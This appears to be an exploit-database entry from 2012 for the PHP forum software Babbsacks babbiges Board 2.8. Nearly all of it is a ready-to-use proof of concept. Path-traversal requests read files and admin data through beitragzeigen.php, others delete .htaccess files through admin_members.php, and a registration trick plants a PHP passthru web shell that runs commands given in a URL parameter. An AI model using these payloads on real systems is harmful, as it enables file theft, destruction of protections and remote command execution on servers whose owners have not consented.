Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites

2012-08-12T00:00:00
ID 1337DAY-ID-19175
Type zdt
Reporter GoLd_M
Modified 2012-08-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Babbsacks babbiges Board 2.8 Full Multiple Vulnerabilites
# Date: 12/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/babb/
# Category:: Local File Disclosure + Arbitrary Delete + File Overwrite
# Google dork: :(
# Tested on: Xp SP 2
# Poc : 
# 1- Local File Disclosure Vulnerability
# /beitragzeigen.php?code=/../../../../index.php
# /beitragzeigen.php?code=/..
# /beitragzeigen.php?code=/../members/memadmin - Get Info Admin
# After Login Admin Control
# 2- Arbitrary Delete Vulnerability
# /admin_members.php?mem=../../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../../.htaccess&del=true&best=true 
# /admin_members.php?mem=../.htaccess&del=true&best=true 
# Delet .htaccess All Files
# 3- Arbitrary File Overwrite (Shell) 
# * Reg username as (a.php)
# * Ur Pass As <? passthru("$_GET[cmd]");?>
# * Go /data/babb/members/mem[username]
# * As /data/babb/members/mema.php?cmd=dir
##############################################################
#     Video : http://www.youtube.com/watch?v=WsLvmUN479I     #
##############################################################



#  0day.today [2018-03-05]  #